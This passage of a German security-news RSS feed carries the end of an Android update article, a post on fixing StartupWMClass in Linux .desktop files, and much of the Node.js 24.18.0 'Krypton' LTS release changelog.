<p><strong>Wichtig: </strong>Nur weil Sie kein Android-Update mehr bekommen, heißt es nicht, dass Ihr Gerät unsicher ist. Prüfen Sie also am besten, ob Ihr Hersteller weiterhin Funktions- und Sicherheitsupdates ausliefert. Ansonsten können Sie hier <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">unsere Liste der 12 besten Smartphones</a> ansehen oder die <a href="https://www.pcwelt.de/article/2780193/beste-smartphones-handys-bis-500-euro.html" target="_blank" rel="noreferrer noopener">besten Geräte unter 500 Euro</a> sowie<a href="https://www.pcwelt.de/article/2778347/beste-budget-smartphones-bis-300-euro.html" target="_blank" rel="noreferrer noopener"> unter 300 Euro</a> prüfen, um ein neues Modell zu finden.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Demystifying StartupWMClass :: Terminal Thoughts]]></title>
<description><![CDATA[As the maintainer of Plank Reloaded, the most common bug report I get is "this app has the wrong icon." It's almost never the dock, it's a broken StartupWMClass in the app's .desktop file. So I wrote up how to find the right value on X11, Wayland, and KDE, and why deleting the line often fixes it...]]></description>
<link>https://tsecurity.de/de/3620068/linux-tipps/demystifying-startupwmclass-terminal-thoughts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620068/linux-tipps/demystifying-startupwmclass-terminal-thoughts/</guid>
<pubDate>Wed, 24 Jun 2026 04:40:03 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>As the maintainer of Plank Reloaded, the most common bug report I get is "this app has the wrong icon." It's almost never the dock, it's a broken StartupWMClass in the app's .desktop file. So I wrote up how to find the right value on X11, Wayland, and KDE, and why deleting the line often fixes it.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/zquestz"> /u/zquestz </a> <br> <span><a href="https://thoughts.greyh.at/posts/startup-wm-class/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1udycay/demystifying_startupwmclass_terminal_thoughts/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026-06-23, Version 24.18.0 'Krypton' (LTS), @richardlau prepared by @sxa]]></title>
<description><![CDATA[Notable Changes

[e07e7a31e1] - crypto: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) #63527
[44c8ebcbd6] - http: avoid stream listeners on idle agent sockets (Matteo Collina) #64004
[d3ef4122ee] - (SEMVER-MINOR) buffer: increase Buffer.poolSize default to 64 KiB (Matteo Collina) #...]]></description>
<link>https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</guid>
<pubDate>Wed, 24 Jun 2026 01:16:44 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Notable Changes</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9ff36e40f0"><code>9ff36e40f0</code></a>] - <strong>build</strong>: add --enable-all-experimentals build flag (Paolo Insogna) <a href="https://github.com/nodejs/node/pull/62755" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62755/hovercard">#62755</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7c22ee23aa"><code>7c22ee23aa</code></a>] - <strong>build</strong>: def <code>NODE_USE_NODE_CODE_CACHE</code> only used in node_mksnapshot (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63588" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63588/hovercard">#63588</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2551abdb4a"><code>2551abdb4a</code></a>] - <strong>build,win</strong>: enable x64 PGO (Stefan Stojanovic) <a href="https://github.com/nodejs/node/pull/62761" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62761/hovercard">#62761</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e8a55ce9b1"><code>e8a55ce9b1</code></a>] - <strong>crypto</strong>: strengthen argument CHECKs in TurboSHAKE (Tobias Nießen) <a href="https://github.com/nodejs/node/pull/62763" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62763/hovercard">#62763</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ae61cd68f3"><code>ae61cd68f3</code></a>] - <strong>crypto</strong>: harden WebCrypto against prototype pollution (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d05a1d396"><code>3d05a1d396</code></a>] - <strong>crypto</strong>: pass CryptoKey handles to KDF jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f9d10a3f6b"><code>f9d10a3f6b</code></a>] - <strong>crypto</strong>: remove async from WebCrypto methods (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e431d93e9e"><code>e431d93e9e</code></a>] - <strong>crypto</strong>: add WebCrypto CryptoJob mode (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/56e2505e48"><code>56e2505e48</code></a>] - <strong>crypto</strong>: wire ML-DSA and ML-KEM for use when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3bac77f2a8"><code>3bac77f2a8</code></a>] - <strong>crypto</strong>: wire ChaCha20-Poly1305 in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1bff901b09"><code>1bff901b09</code></a>] - <strong>crypto</strong>: wire AES-KW in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4433fca3df"><code>4433fca3df</code></a>] - <strong>crypto</strong>: harden CryptoKey algorithm slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b5cf01217a"><code>b5cf01217a</code></a>] - <strong>crypto</strong>: harden KeyObject internal slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce84aef37d"><code>ce84aef37d</code></a>] - <strong>crypto</strong>: add guards and adjust tests for BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62883" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62883/hovercard">#62883</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26781689b0"><code>26781689b0</code></a>] - <strong>crypto</strong>: reject duplicate ML-KEM JWK key_ops (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62905" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62905/hovercard">#62905</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aeea8f4970"><code>aeea8f4970</code></a>] - <strong>crypto</strong>: add JWK support for ML-KEM and SLH-DSA key types (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62706" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62706/hovercard">#62706</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/407cf91656"><code>407cf91656</code></a>] - <strong>crypto</strong>: guard against size_t overflow on experimental 32-bit arch (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62626" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62626/hovercard">#62626</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b46d52b283"><code>b46d52b283</code></a>] - <strong>crypto</strong>: unify asymmetric key import through KeyObjectHandle::Init (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62499" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62499/hovercard">#62499</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61826df455"><code>61826df455</code></a>] - <strong>crypto</strong>: coerce -0 keylen to +0 in pbkdf2 and scrypt (Jordan Harband) <a href="https://github.com/nodejs/node/pull/63531" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63531/hovercard">#63531</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/16d2fd3c07"><code>16d2fd3c07</code></a>] - <strong>crypto</strong>: align verifyOneShot accepted types (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63280" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63280/hovercard">#63280</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3b8330deda"><code>3b8330deda</code></a>] - <strong>crypto</strong>: improve system certificate enumeration logic on macOS (Robo) <a href="https://github.com/nodejs/node/pull/62576" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62576/hovercard">#62576</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/141de35399"><code>141de35399</code></a>] - <strong>debugger</strong>: add --help to <code>node inspect</code> and improve docs (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63201" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63201/hovercard">#63201</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b76bfcd4fa"><code>b76bfcd4fa</code></a>] - <strong>deps</strong>: upgrade npm to 11.16.0 (npm team) <a href="https://github.com/nodejs/node/pull/63602" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63602/hovercard">#63602</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4ec142314c"><code>4ec142314c</code></a>] - <strong>deps</strong>: SQLite: cherry-pick b869ed6b067d623cb1383549f2a18aa35508385d (Junsu Han) <a href="https://github.com/nodejs/node/pull/63525" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63525/hovercard">#63525</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/19e8ce1c36"><code>19e8ce1c36</code></a>] - <strong>deps</strong>: upgrade npm to 11.15.0 (npm team) <a href="https://github.com/nodejs/node/pull/63463" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63463/hovercard">#63463</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a264260e2"><code>8a264260e2</code></a>] - <strong>deps</strong>: update sqlite to 3.53.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63217" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63217/hovercard">#63217</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/50c8ff3f94"><code>50c8ff3f94</code></a>] - <strong>deps</strong>: update simdjson to 4.6.4 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62811" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62811/hovercard">#62811</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6e56f01c4b"><code>6e56f01c4b</code></a>] - <strong>deps</strong>: V8: cherry-pick 435a2cdf664c (Matthias Liedtke) <a href="https://github.com/nodejs/node/pull/63136" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63136/hovercard">#63136</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3ba813b242"><code>3ba813b242</code></a>] - <strong>deps</strong>: cherry-pick <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/libuv/libuv/commit/a43e543/hovercard" href="https://github.com/libuv/libuv/commit/a43e543">libuv/libuv@<tt>a43e543</tt></a> (Ali Hassan) <a href="https://github.com/nodejs/node/pull/63222" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63222/hovercard">#63222</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2390e3a5ac"><code>2390e3a5ac</code></a>] - <strong>doc</strong>: remove duplicated sentences in large-pull-requests.md (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63650" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63650/hovercard">#63650</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/52a1c18374"><code>52a1c18374</code></a>] - <strong>doc</strong>: update <code>git node land</code> instructions for security releases (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63586" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63586/hovercard">#63586</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3e6b4da037"><code>3e6b4da037</code></a>] - <strong>doc</strong>: drop --experimental from --permission (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63583" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63583/hovercard">#63583</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/84d05163b9"><code>84d05163b9</code></a>] - <strong>doc</strong>: explicitly ask for reproducible in JS (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63479" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63479/hovercard">#63479</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7da2a4450e"><code>7da2a4450e</code></a>] - <strong>doc</strong>: fix URL postMessage example in worker_threads (Kit Dallege) <a href="https://github.com/nodejs/node/pull/62203" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62203/hovercard">#62203</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d79bd8b29"><code>3d79bd8b29</code></a>] - <strong>doc</strong>: clarify <code>filter</code> option of <code>sqlite.database.applyChangeset</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63515" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63515/hovercard">#63515</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4f4174aace"><code>4f4174aace</code></a>] - <strong>doc</strong>: fix double spaces in ERR_TLS_INVALID_PROTOCOL_METHOD (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63511" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63511/hovercard">#63511</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/388323ca4b"><code>388323ca4b</code></a>] - <strong>doc</strong>: fix double space in modules.md (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63512" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63512/hovercard">#63512</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5258ccc058"><code>5258ccc058</code></a>] - <strong>doc</strong>: fix "options" to "option" in tls.createServer (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63453" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63453/hovercard">#63453</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/43e83e6507"><code>43e83e6507</code></a>] - <strong>doc</strong>: fix typo in deprecations (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63434" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63434/hovercard">#63434</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f05a61d54c"><code>f05a61d54c</code></a>] - <strong>doc</strong>: remove unsupported template type from v8.md (René) <a href="https://github.com/nodejs/node/pull/63410" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63410/hovercard">#63410</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c39d5fc820"><code>c39d5fc820</code></a>] - <strong>doc</strong>: fix article usage before vowel-sound acronyms (joao-oliveira-softtor) <a href="https://github.com/nodejs/node/pull/62696" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62696/hovercard">#62696</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/398261f911"><code>398261f911</code></a>] - <strong>doc</strong>: remove the bi-monthly contributor spotlight section (Claudio Wunder) <a href="https://github.com/nodejs/node/pull/62734" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62734/hovercard">#62734</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fd9e14c405"><code>fd9e14c405</code></a>] - <strong>doc</strong>: update http2's <code>push</code> and <code>trailers</code> events with <code>rawHeaders</code> param (YuSheng Chen) <a href="https://github.com/nodejs/node/pull/63259" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63259/hovercard">#63259</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b943ce6933"><code>b943ce6933</code></a>] - <strong>doc</strong>: remove inactive members from Triagers list (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63329" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63329/hovercard">#63329</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b9cdfc022"><code>4b9cdfc022</code></a>] - <strong>doc</strong>: reference correct function in Module docs (Robin Malfait) <a href="https://github.com/nodejs/node/pull/63247" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63247/hovercard">#63247</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bed84b6df2"><code>bed84b6df2</code></a>] - <strong>doc</strong>: replace Visual Studio 2022 Evergreen version reference with 17.14 (Mike McCready) <a href="https://github.com/nodejs/node/pull/63211" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63211/hovercard">#63211</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/32ea70569b"><code>32ea70569b</code></a>] - <strong>doc</strong>: recommend explicitly Tier 1 or 2 for production applications (Mike McCready) <a href="https://github.com/nodejs/node/pull/63187" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63187/hovercard">#63187</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4627bcfd82"><code>4627bcfd82</code></a>] - <strong>doc</strong>: run license-builder (github-actions[bot]) <a href="https://github.com/nodejs/node/pull/63232" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63232/hovercard">#63232</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/28eba71845"><code>28eba71845</code></a>] - <strong>doc</strong>: add large pull requests contributing guide (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62829" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62829/hovercard">#62829</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2648efd438"><code>2648efd438</code></a>] - <strong>doc</strong>: remove unnecessary <code>&lt;!-- eslint-</code> magic comments (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63200" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63200/hovercard">#63200</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a95fc1f8fc"><code>a95fc1f8fc</code></a>] - <strong>doc</strong>: clarify SEA platform support excludes darwin-x64 (MJSHANG) <a href="https://github.com/nodejs/node/pull/63181" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63181/hovercard">#63181</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aaef29e2e1"><code>aaef29e2e1</code></a>] - <strong>doc</strong>: update release steps when post-release fails (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63131" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63131/hovercard">#63131</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d81419cf2"><code>7d81419cf2</code></a>] - <strong>doc</strong>: add Hmac.digest() documentation-only deprecation (DEP0206) (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63121" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63121/hovercard">#63121</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ececd80d81"><code>ececd80d81</code></a>] - <strong>doc</strong>: document the latest-vX.x schema (Marco Ippolito) <a href="https://github.com/nodejs/node/pull/63033" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63033/hovercard">#63033</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/27c1c1d842"><code>27c1c1d842</code></a>] - <strong>doc</strong>: remove list of versions in <code>BUILDING.md</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63113" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63113/hovercard">#63113</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e369886a65"><code>e369886a65</code></a>] - <strong>doc,sqlite</strong>: document entryPoint argument for loadExtension (Edy Silva) <a href="https://github.com/nodejs/node/pull/63152" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63152/hovercard">#63152</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4e5137cbd"><code>e4e5137cbd</code></a>] - <strong>errors</strong>: handle V8 warnings in DisallowJavascriptExecutionScope (Divyanshu Sharma) <a href="https://github.com/nodejs/node/pull/63491" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63491/hovercard">#63491</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d1f6048d2"><code>6d1f6048d2</code></a>] - <strong>fs</strong>: make <code>Date</code> properties on <code>Stats</code> enumerable (LiviaMedeiros) <a href="https://github.com/nodejs/node/pull/63328" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63328/hovercard">#63328</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/39f61fb06c"><code>39f61fb06c</code></a>] - <strong>http2</strong>: emit session close before stream close (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63414" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63414/hovercard">#63414</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a8f2127d1"><code>8a8f2127d1</code></a>] - <strong>http2</strong>: validate non-link headers in writeEarlyHints (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62017/hovercard">#62017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c05f38229b"><code>c05f38229b</code></a>] - <strong>lib</strong>: cleanup stateless diffiehellman key handling (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62645" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62645/hovercard">#62645</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1c16b45d35"><code>1c16b45d35</code></a>] - <strong>lib</strong>: refactor internal webidl converters (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62979" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62979/hovercard">#62979</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f35d6dce"><code>02f35d6dce</code></a>] - <strong>lib</strong>: define <code>kEnumerableProperty</code> atomically (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63609" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63609/hovercard">#63609</a></li>
